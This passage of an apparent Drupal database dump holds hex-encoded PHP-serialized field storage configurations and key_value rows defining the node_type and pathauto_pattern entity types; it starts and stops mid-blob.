31303a226669656c645f6e616d65223b733a32363a22636f6e74656e745f7472616e736c6174696f6e5f736f75726365223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31393a226669656c645f6974656d3a6c616e6775616765223b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a313138373b7d733a373a22002a0074797065223b733a383a226c616e6775616765223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a32383a22636f6e74656e745f7472616e736c6174696f6e5f6f75746461746564223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a31303a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32303a225472616e736c6174696f6e206f75746461746564223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a36363a224120626f6f6c65616e20696e6469636174696e6720776865746865722074686973207472616e736c6174696f6e206e6565647320746f20626520757064617465642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b623a303b7d7d733a31333a22696e697469616c5f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b623a303b7d7d733a31323a227265766973696f6e61626c65223b623a313b733a31323a227472616e736c617461626c65223b623a313b733a383a2270726f7669646572223b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b733a31303a226669656c645f6e616d65223b733a32383a22636f6e74656e745f7472616e736c6174696f6e5f6f75746461746564223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a626f6f6c65616e223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a323a224f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a226f66665f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a333a224f6666223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a313232343b7d733a373a22002a0074797065223b733a373a22626f6f6c65616e223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31363a226669656c645f736c696465725f696d67223b4f3a33383a2244727570616c5c6669656c645c456e746974795c4669656c6453746f72616765436f6e666967223a33353a7b733a31353a22002a00656e74697479547970654964223b733a32303a226669656c645f73746f726167655f636f6e666967223b733a31353a22002a00656e666f72636549734e6577223b4e3b733a31323a22002a00747970656444617461223b4e3b733a31363a22002a006361636865436f6e7465787473223b613a313a7b693a303b733a32383a226c616e6775616765733a6c616e67756167655f696e74657266616365223b7d733a31323a22002a00636163686554616773223b613a303a7b7d733a31343a22002a0063616368654d6178416765223b693a2d313b733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a31333a22002a006f726967696e616c4964223b733a32313a226e6f64652e6669656c645f736c696465725f696d67223b733a393a22002a00737461747573223b623a313b733a373a22002a0075756964223b733a33363a2263626230643634622d356335362d343633342d623634662d323462613431656662663662223b733a31313a22002a006c616e67636f6465223b733a323a226b6f223b733a32333a22002a0074686972645f70617274795f73657474696e6773223b613a303a7b7d733a383a22002a005f636f7265223b613a303a7b7d733a31343a22002a007472757374656444617461223b623a303b733a31353a22002a00646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a333a7b693a303b733a343a2266696c65223b693a313b733a353a22696d616765223b693a323b733a343a226e6f6465223b7d7d733a31323a22002a00697353796e63696e67223b623a303b733a353a22002a006964223b733a32313a226e6f64652e6669656c645f736c696465725f696d67223b733a31333a22002a006669656c645f6e616d65223b733a31363a226669656c645f736c696465725f696d67223b733a31343a22002a00656e746974795f74797065223b733a343a226e6f6465223b733a373a22002a0074797065223b733a353a22696d616765223b733a393a22002a006d6f64756c65223b733a353a22696d616765223b733a31313a22002a0073657474696e6773223b613a353a7b733a31303a227572695f736368656d65223b733a363a227075626c6963223b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b733a303a22223b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b733a31353a22646973706c61795f64656661756c74223b623a303b7d733a31343a22002a0063617264696e616c697479223b733a313a2231223b733a31353a22002a007472616e736c617461626c65223b623a313b733a393a22002a006c6f636b6564223b623a303b733a32353a22002a00706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b733a31303a22002a00696e6465786573223b613a303a7b7d733a31303a22002a0064656c65746564223b623a303b733a31383a2263617264696e616c6974795f6e756d626572223b733a313a2231223b733a363a227375626d6974223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a2253617665206669656c642073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31333a22666f726d5f6275696c645f6964223b733a34383a22666f726d2d2d667542546f34345737366c6e35773669652d434b6d4f6b51514665594f6d626e464f4352724c6f4a5a73223b733a31303a22666f726d5f746f6b656e223b733a34333a225f516d333261736d66473967634247504238303061455661584449324f6a486f654449467a385649564b38223b733a373a22666f726d5f6964223b733a33303a226669656c645f73746f726167655f636f6e6669675f656469745f666f726d223b7d733a32343a226669656c645f63656e7465725f6465736372697074696f6e223b4f3a33383a2244727570616c5c6669656c645c456e746974795c4669656c6453746f72616765436f6e666967223a33323a7b733a31353a22002a00656e74697479547970654964223b733a32303a226669656c645f73746f726167655f636f6e666967223b733a31353a22002a00656e666f72636549734e6577223b623a313b733a31323a22002a00747970656444617461223b4e3b733a31363a22002a006361636865436f6e7465787473223b613a303a7b7d733a31323a22002a00636163686554616773223b613a303a7b7d733a31343a22002a0063616368654d6178416765223b693a2d313b733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a31333a22002a006f726967696e616c4964223b733a32393a226e6f64652e6669656c645f63656e7465725f6465736372697074696f6e223b733a393a22002a00737461747573223b623a313b733a373a22002a0075756964223b733a33363a2236656464333138632d373739302d346163342d613133302d656633393133383361613530223b733a31313a22002a006c616e67636f6465223b733a323a226a61223b733a32333a22002a0074686972645f70617274795f73657474696e6773223b613a303a7b7d733a383a22002a005f636f7265223b613a303a7b7d733a31343a22002a007472757374656444617461223b623a303b733a31353a22002a00646570656e64656e63696573223b613a303a7b7d733a31323a22002a00697353796e63696e67223b623a303b733a353a22002a006964223b733a32393a226e6f64652e6669656c645f63656e7465725f6465736372697074696f6e223b733a31333a22002a006669656c645f6e616d65223b733a32343a226669656c645f63656e7465725f6465736372697074696f6e223b733a31343a22002a00656e746974795f74797065223b733a343a226e6f6465223b733a373a22002a0074797065223b733a31373a22746578745f776974685f73756d6d617279223b733a393a22002a006d6f64756c65223b733a343a2274657874223b733a31313a22002a0073657474696e6773223b613a303a7b7d733a31343a22002a0063617264696e616c697479223b693a313b733a31353a22002a007472616e736c617461626c65223b623a313b733a393a22002a006c6f636b6564223b623a303b733a32353a22002a00706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b733a31303a22002a00696e6465786573223b613a303a7b7d733a31303a22002a0064656c65746564223b623a303b733a32303a226669656c645f73746f726167655f7375626d6974223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31353a225570646174652073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31383a2263617264696e616c6974795f6e756d626572223b733a313a2231223b7d733a32363a226669656c645f63656e7465725f646f776e6c6f61645f66696c65223b4f3a33383a2244727570616c5c6669656c645c456e746974795c4669656c6453746f72616765436f6e666967223a33323a7b733a31353a22002a00656e74697479547970654964223b733a32303a226669656c645f73746f726167655f636f6e666967223b733a31353a22002a00656e666f72636549734e6577223b623a313b733a31323a22002a00747970656444617461223b4e3b733a31363a22002a006361636865436f6e7465787473223b613a303a7b7d733a31323a22002a00636163686554616773223b613a303a7b7d733a31343a22002a0063616368654d6178416765223b693a2d313b733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a31333a22002a006f726967696e616c4964223b733a33313a226e6f64652e6669656c645f63656e7465725f646f776e6c6f61645f66696c65223b733a393a22002a00737461747573223b623a313b733a373a22002a0075756964223b733a33363a2263646663366331322d323566652d346665652d393833652d623966353139316633303535223b733a31313a22002a006c616e67636f6465223b733a323a226a61223b733a32333a22002a0074686972645f70617274795f73657474696e6773223b613a303a7b7d733a383a22002a005f636f7265223b613a303a7b7d733a31343a22002a007472757374656444617461223b623a303b733a31353a22002a00646570656e64656e63696573223b613a303a7b7d733a31323a22002a00697353796e63696e67223b623a303b733a353a22002a006964223b733a33313a226e6f64652e6669656c645f63656e7465725f646f776e6c6f61645f66696c65223b733a31333a22002a006669656c645f6e616d65223b733a32363a226669656c645f63656e7465725f646f776e6c6f61645f66696c65223b733a31343a22002a00656e746974795f74797065223b733a343a226e6f6465223b733a373a22002a0074797065223b733a343a2266696c65223b733a393a22002a006d6f64756c65223b733a343a2266696c65223b733a31313a22002a0073657474696e6773223b613a343a7b733a31333a22646973706c61795f6669656c64223b693a303b733a31353a22646973706c61795f64656661756c74223b693a303b733a31303a227572695f736368656d65223b733a363a227075626c6963223b733a31313a227461726765745f74797065223b733a343a2266696c65223b7d733a31343a22002a0063617264696e616c697479223b733a323a222d31223b733a31353a22002a007472616e736c617461626c65223b623a313b733a393a22002a006c6f636b6564223b623a303b733a32353a22002a00706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b733a31303a22002a00696e6465786573223b613a303a7b7d733a31303a22002a0064656c65746564223b623a303b733a32303a226669656c645f73746f726167655f7375626d6974223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31353a225570646174652073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31383a2263617264696e616c6974795f6e756d626572223b733a313a2231223b7d733a31363a226669656c645f63656e7465725f696d67223b4f3a33383a2244727570616c5c6669656c645c456e746974795c4669656c6453746f72616765436f6e666967223a33323a7b733a31353a22002a00656e74697479547970654964223b733a32303a226669656c645f73746f726167655f636f6e666967223b733a31353a22002a00656e666f72636549734e6577223b623a313b733a31323a22002a00747970656444617461223b4e3b733a31363a22002a006361636865436f6e7465787473223b613a303a7b7d733a31323a22002a00636163686554616773223b613a303a7b7d733a31343a22002a0063616368654d6178416765223b693a2d313b733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a31333a22002a006f726967696e616c4964223b733a32313a226e6f64652e6669656c645f63656e7465725f696d67223b733a393a22002a00737461747573223b623a313b733a373a22002a0075756964223b733a33363a2266373330303037612d656538382d346266662d613834622d343630333138363136353638223b733a31313a22002a006c616e67636f6465223b733a323a226a61223b733a32333a22002a0074686972645f70617274795f73657474696e6773223b613a303a7b7d733a383a22002a005f636f7265223b613a303a7b7d733a31343a22002a007472757374656444617461223b623a303b733a31353a22002a00646570656e64656e63696573223b613a303a7b7d733a31323a22002a00697353796e63696e67223b623a303b733a353a22002a006964223b733a32313a226e6f64652e6669656c645f63656e7465725f696d67223b733a31333a22002a006669656c645f6e616d65223b733a31363a226669656c645f63656e7465725f696d67223b733a31343a22002a00656e746974795f74797065223b733a343a226e6f6465223b733a373a22002a0074797065223b733a353a22696d616765223b733a393a22002a006d6f64756c65223b733a353a22696d616765223b733a31313a22002a0073657474696e6773223b613a353a7b733a31303a227572695f736368656d65223b733a363a227075626c6963223b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b733a303a22223b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d733a31353a22646973706c61795f64656661756c74223b623a313b733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b7d733a31343a22002a0063617264696e616c697479223b693a313b733a31353a22002a007472616e736c617461626c65223b623a313b733a393a22002a006c6f636b6564223b623a303b733a32353a22002a00706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b733a31303a22002a00696e6465786573223b613a303a7b7d733a31303a22002a0064656c65746564223b623a303b733a32303a226669656c645f73746f726167655f7375626d6974223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31353a225570646174652073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31383a2263617264696e616c6974795f6e756d626572223b733a313a2231223b7d733a32323a226669656c645f63656e7465725f706f73745f64617465223b4f3a33383a2244727570616c5c6669656c645c456e746974795c4669656c6453746f72616765436f6e666967223a33323a7b733a31353a22002a00656e74697479547970654964223b733a32303a226669656c645f73746f726167655f636f6e666967223b733a31353a22002a00656e666f72636549734e6577223b4e3b733a31323a22002a00747970656444617461223b4e3b733a31363a22002a006361636865436f6e7465787473223b613a313a7b693a303b733a32383a226c616e6775616765733a6c616e67756167655f696e74657266616365223b7d733a31323a22002a00636163686554616773223b613a303a7b7d733a31343a22002a0063616368654d6178416765223b693a2d313b733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a31333a22002a006f726967696e616c4964223b733a32373a226e6f64652e6669656c645f63656e7465725f706f73745f64617465223b733a393a22002a00737461747573223b623a313b733a373a22002a0075756964223b733a33363a2262343861623438642d636136362d343938322d623866392d613561366534336265666235223b733a31313a22002a006c616e67636f6465223b733a323a226a61223b733a32333a22002a0074686972645f70617274795f73657474696e6773223b613a303a7b7d733a383a22002a005f636f7265223b613a303a7b7d733a31343a22002a007472757374656444617461223b623a303b733a31353a22002a00646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a383a226461746574696d65223b693a313b733a343a226e6f6465223b7d7d733a31323a22002a00697353796e63696e67223b623a303b733a353a22002a006964223b733a32373a226e6f64652e6669656c645f63656e7465725f706f73745f64617465223b733a31333a22002a006669656c645f6e616d65223b733a32323a226669656c645f63656e7465725f706f73745f64617465223b733a31343a22002a00656e746974795f74797065223b733a343a226e6f6465223b733a373a22002a0074797065223b733a383a226461746574696d65223b733a393a22002a006d6f64756c65223b733a383a226461746574696d65223b733a31313a22002a0073657474696e6773223b613a313a7b733a31333a226461746574696d655f74797065223b733a383a226461746574696d65223b7d733a31343a22002a0063617264696e616c697479223b693a313b733a31353a22002a007472616e736c617461626c65223b623a313b733a393a22002a006c6f636b6564223b623a303b733a32353a22002a00706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b733a31303a22002a00696e6465786573223b613a303a7b7d733a31303a22002a0064656c65746564223b623a303b733a32303a226669656c645f73746f726167655f7375626d6974223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31353a225570646174652073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31383a2263617264696e616c6974795f6e756d626572223b733a313a2231223b7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.definitions.installed', 'node_type.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a393a226e6f64655f74797065223b733a383a22002a00636c617373223b733a32373a2244727570616c5c6e6f64655c456e746974795c4e6f646554797065223b733a31313a22002a0070726f7669646572223b733a343a226e6f6465223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a383a7b733a323a226964223b733a343a2274797065223b733a353a226c6162656c223b733a343a226e616d65223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a32373a2244727570616c5c6e6f64655c456e746974795c4e6f646554797065223b733a31313a22002a0068616e646c657273223b613a353a7b733a363a22616363657373223b733a34303a2244727570616c5c6e6f64655c4e6f646554797065416363657373436f6e74726f6c48616e646c6572223b733a343a22666f726d223b613a333a7b733a333a22616464223b733a32343a2244727570616c5c6e6f64655c4e6f646554797065466f726d223b733a343a2265646974223b733a32343a2244727570616c5c6e6f64655c4e6f646554797065466f726d223b733a363a2264656c657465223b733a33383a2244727570616c5c6e6f64655c466f726d5c4e6f64655479706544656c657465436f6e6669726d223b7d733a31343a22726f7574655f70726f7669646572223b613a313a7b733a31313a227065726d697373696f6e73223b733a34393a2244727570616c5c757365725c456e746974795c456e746974795065726d697373696f6e73526f75746550726f7669646572223b7d733a31323a226c6973745f6275696c646572223b733a33313a2244727570616c5c6e6f64655c4e6f6465547970654c6973744275696c646572223b733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a32343a2261646d696e697374657220636f6e74656e74207479706573223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a343a7b733a393a22656469742d666f726d223b733a34313a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d223b733a31313a2264656c6574652d666f726d223b733a34383a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f64656c657465223b733a32333a22656e746974792d7065726d697373696f6e732d666f726d223b733a35333a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f7065726d697373696f6e73223b733a31303a22636f6c6c656374696f6e223b733a32323a222f61646d696e2f7374727563747572652f7479706573223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b733a343a226e6f6465223b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22436f6e74656e742074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e74656e74207479706573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22636f6e74656e742074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22636f6e74656e74207479706573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31393a2240636f756e7420636f6e74656e742074797065223b733a363a22706c7572616c223b733a32303a2240636f756e7420636f6e74656e74207479706573223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a32313a22636f6e6669673a6e6f64655f747970655f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b733a343a2274797065223b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a373a7b693a303b733a343a226e616d65223b693a313b733a343a2274797065223b693a323b733a31313a226465736372697074696f6e223b693a333b733a343a2268656c70223b693a343b733a31323a226e65775f7265766973696f6e223b693a353b733a31323a22707265766965775f6d6f6465223b693a363b733a31373a22646973706c61795f7375626d6974746564223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'pathauto_pattern.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a31363a22706174686175746f5f7061747465726e223b733a383a22002a00636c617373223b733a33383a2244727570616c5c706174686175746f5c456e746974795c506174686175746f5061747465726e223b733a31313a22002a0070726f7669646572223b733a383a22706174686175746f223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a31303a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a343a2275756964223b733a343a2275756964223b733a363a22776569676874223b733a363a22776569676874223b733a363a22737461747573223b733a363a22737461747573223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b7d733a31363a22002a006f726967696e616c436c617373223b733a33383a2244727570616c5c706174686175746f5c456e746974795c506174686175746f5061747465726e223b733a31313a22002a0068616e646c657273223b613a353a7b733a31323a226c6973745f6275696c646572223b733a34323a2244727570616c5c706174686175746f5c506174686175746f5061747465726e4c6973744275696c646572223b733a343a22666f726d223b613a353a7b733a373a2264656661756c74223b733a33363a2244727570616c5c706174686175746f5c466f726d5c5061747465726e45646974466f726d223b733a393a226475706c6963617465223b733a34313a2244727570616c5c706174686175746f5c466f726d5c5061747465726e4475706c6963617465466f726d223b733a363a2264656c657465223b733a33353a2244727570616c5c436f72655c456e746974795c456e7469747944656c657465466f726d223b733a363a22656e61626c65223b733a33383a2244727570616c5c706174686175746f5c466f726d5c5061747465726e456e61626c65466f726d223b733a373a2264697361626c65223b733a33393a2244727570616c5c706174686175746f5c466f726d5c5061747465726e44697361626c65466f726d223b7d733a31343a22726f7574655f70726f7669646572223b613a313a7b733a343a2268746d6c223b733a35313a2244727570616c5c436f72655c456e746974795c526f7574696e675c44656661756c7448746d6c526f75746550726f7669646572223b7d733a363a22616363657373223b733a34353a2244727570616c5c436f72655c456e746974795c456e74697479416363657373436f6e74726f6c48616e646c6572223b733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a31393a2261646d696e697374657220706174686175746f223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a363a7b733a31303a22636f6c6c656374696f6e223b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b733a393a22656469742d666f726d223b733a35333a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d223b733a31313a2264656c6574652d666f726d223b733a36303a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d2f64656c657465223b733a363a22656e61626c65223b733a36303a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d2f656e61626c65223b733a373a2264697361626c65223b733a36313a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d2f64697361626c65223b733a31343a226475706c69636174652d666f726d223b733a36333a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d2f6475706c6963617465223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a22506174686175746f207061747465726e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b733a303a22223b733a31373a22002a006c6162656c5f73696e67756c6172223b733a303a22223b733a31353a22002a006c6162656c5f706c7572616c223b733a303a22223b733a31343a22002a006c6162656c5f6